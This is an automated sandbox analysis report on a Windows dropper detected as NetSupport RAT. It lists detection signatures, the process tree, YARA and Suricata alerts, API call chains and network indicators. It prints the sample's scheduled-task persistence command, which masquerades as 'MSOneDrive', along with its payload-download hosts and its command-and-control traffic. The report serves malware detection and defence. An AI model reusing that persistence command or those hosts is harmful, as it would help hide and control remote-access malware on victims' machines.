Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
Analysis ID: 1514955
MD5: aace5ed77f7d47cad3e45e0ccdc5411c
SHA1: cb9c403e8ba1a5531543d6c3b46250065b7f49c0
SHA256: a179d25f0ca4b9f6b7b1b7b4376664e422a6341650f80ba58626881638b64d50
Tags: exe

Detection

NetSupport RAT
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to change the wallpaper
Delayed program exit found
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe (PID: 4504 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe" MD5: AACE5ED77F7D47CAD3E45E0CCDC5411C)
    • schtasks.exe (PID: 7376 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • client32.exe (PID: 7384 cmdline: C:\Users\user\AppData\Local/MSOneDrive\client32.exe MD5: F6ABEF857450C97EA74CD8F0EB9A8C0A)
  • client32.exe (PID: 7512 cmdline: C:\Users\user\AppData\Local/MSOneDrive\client32.exe MD5: F6ABEF857450C97EA74CD8F0EB9A8C0A)
  • cleanup
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Local\MSOneDrive\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

Source | Rule | Description | Author
0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Source | Rule | Description | Author
13.0.client32.exe.9d0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
11.2.client32.exe.6cb70000.6.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
11.0.client32.exe.9d0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
13.2.client32.exe.6cb70000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
11.2.client32.exe.9d0000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-21T14:45:31.650706+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 142.11.212.184 | 443 | TCP
2024-09-21T14:45:36.119849+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 142.11.212.184 | 443 | TCP
2024-09-21T14:45:37.285896+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49702 | 142.11.212.184 | 443 | TCP
2024-09-21T14:45:38.537220+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 142.11.212.184 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-21T14:45:24.705430+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49704 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 63016 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 63020 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 63019 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 63018 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 63021 | 37.1.209.225 | 443 | TCP
2024-09-21T14:45:24.705430+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 63017 | 37.1.209.225 | 443 | TCP

AV Detection

Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | ReversingLabs: Detection: 68%
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110A57F0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,11_2_110A57F0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_110A57F0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,13_2_110A57F0
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | File opened: C:\Users\user\AppData\Local\MSOneDrive\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 142.11.212.184:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: ir41_qcx.pdb source: ir41_qcx.dll.3.dr
Source: Binary string: uimanagerbrokerps.pdb source: UIManagerBrokerps.dll.3.dr
Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcichek.pdb source: client32.exe, 0000000B.00000002.3755622548.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000D.00000002.1392811349.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, PCICHEK.DLL.3.dr
Source: Binary string: ir50_32.pdb source: ir50_32.dll.3.dr
Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr
Source: Binary string: stub.pdbGCTL source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
Source: Binary string: icmp.pdbGCTL source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
Source: Binary string: smalldll.pdbGCTL source: dxmasf.dll.3.dr
Source: Binary string: E:\nsmsrc\nsm\1280\1280f12\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.3.dr
Source: Binary string: icmp.pdb source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
Source: Binary string: winrssrv.pdbGCTL source: winrssrv.dll.3.dr
Source: Binary string: wiatrace.pdb source: wiatrace.dll.3.dr
Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 0000000B.00000002.3755499542.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 0000000D.00000002.1392710495.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.3.dr
Source: Binary string: E:\DNA\DNABuilds\DNA450\DNA450F3i1\client32\release_unicode_2015\dnarc.pdb source: client32.exe, 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe.3.dr
Source: Binary string: smalldll.pdb source: dxmasf.dll.3.dr
Source: Binary string: E:\nsmsrc\NSN\300\CVA_300F1\Ctl32\release\htctl32.pdb source: client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.dr
Source: Binary string: winrssrv.pdb source: winrssrv.dll.3.dr
Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.3755290602.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.1392381174.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, msvcr100.dll.3.dr
Source: Binary string: ir50_32.pdbGCTL source: ir50_32.dll.3.dr
Source: Binary string: uimanagerbrokerps.pdbGCTL source: UIManagerBrokerps.dll.3.dr
Source: Binary string: wiatrace.pdbUGP source: wiatrace.dll.3.dr
Source: Binary string: WFAPIGP.pdb source: wfapigp.dll.3.dr
Source: Binary string: WerEnc.pdb source: WerEnc.dll.3.dr
Source: Binary string: stub.pdb source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
Source: Binary string: GetUName.pdbGCTL source: getuname.dll.3.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.3.dr
Source: Binary string: WFAPIGP.pdbUGP source: wfapigp.dll.3.dr
Source: Binary string: GetUName.pdb source: getuname.dll.3.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.3.dr
Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.3.dr
Source: Binary string: WerEnc.pdbGCTL source: WerEnc.dll.3.dr
Source: Binary string: ir41_qcx.pdbGCTL source: ir41_qcx.dll.3.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C8F905 FindFirstFileExW,3_2_00C8F905
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11061140
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,11_2_11065870
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110B3B00
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102BB50
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111180C0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 11_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_110FE450
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102BB50
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_11061140
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,13_2_11065870
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,13_2_110B3B00
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111180C0
Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Code function: 13_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_110FE450

Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49704 -> 37.1.209.225:443
Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63016 -> 37.1.209.225:443
Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63020 -> 37.1.209.225:443
Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63019 -> 37.1.209.225:443
Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63018 -> 37.1.209.225:443
Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63021 -> 37.1.209.225:443
Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63017 -> 37.1.209.225:443
Source: global traffic | HTTP traffic detected: GET /ssd/sdn1.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /ssd/sdn2.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /ssd/sdn3.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /ssd/sdn4.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 172.67.68.212
Source: Joe Sandbox View | ASN Name: HVC-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 142.11.212.184:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 142.11.212.184:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 142.11.212.184:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 142.11.212.184:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Code function: 3_2_00C825B0 GetProcessHeap,InternetOpenW,InternetOpenUrlW,GetProcessHeap,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlReAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,3_2_00C825B0
Source: global traffic | HTTP traffic detected: GET /ssd/sdn1.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /ssd/sdn2.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /ssd/sdn3.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /ssd/sdn4.zip HTTP/1.1 | Host: mlm-cdn.com
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: mlm-cdn.com
Source: global traffic | DNS traffic detected: DNS query: armayalitim.com
Source: global traffic | DNS traffic detected: DNS query: armayalitim1722.com
Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown | HTTP traffic detected: POST http://37.1.209.225/fakeurl.htm HTTP/1.1 | User-Agent: NetSupport Manager/1.3 | Content-Type: application/x-www-form-urlencoded | Content-Length: 22 | Host: 37.1.209.225 | Connection: Keep-Alive | CMD=POLLINFO=1ACK=1
Source: client32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.dr | String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.dr | String found in binary or memory: http://%s/testpage.htm
Source: client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.dr | String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | String found in binary or memory: http://127.0.0.1
Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr | String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr | String found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1372124884.00000000037A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
Source: remcmdstub.exe.3.dr | String found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: pcicapi.dll.3.dr, remcmdstub.exe.3.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: remcmdstub.exe.3.dr | String found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: pcicapi.dll.3.dr, remcmdstub.exe.3.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: client32.exe, 0000000B.00000003.1671103639.0000000001162000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.3746392967.0000000001162000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/
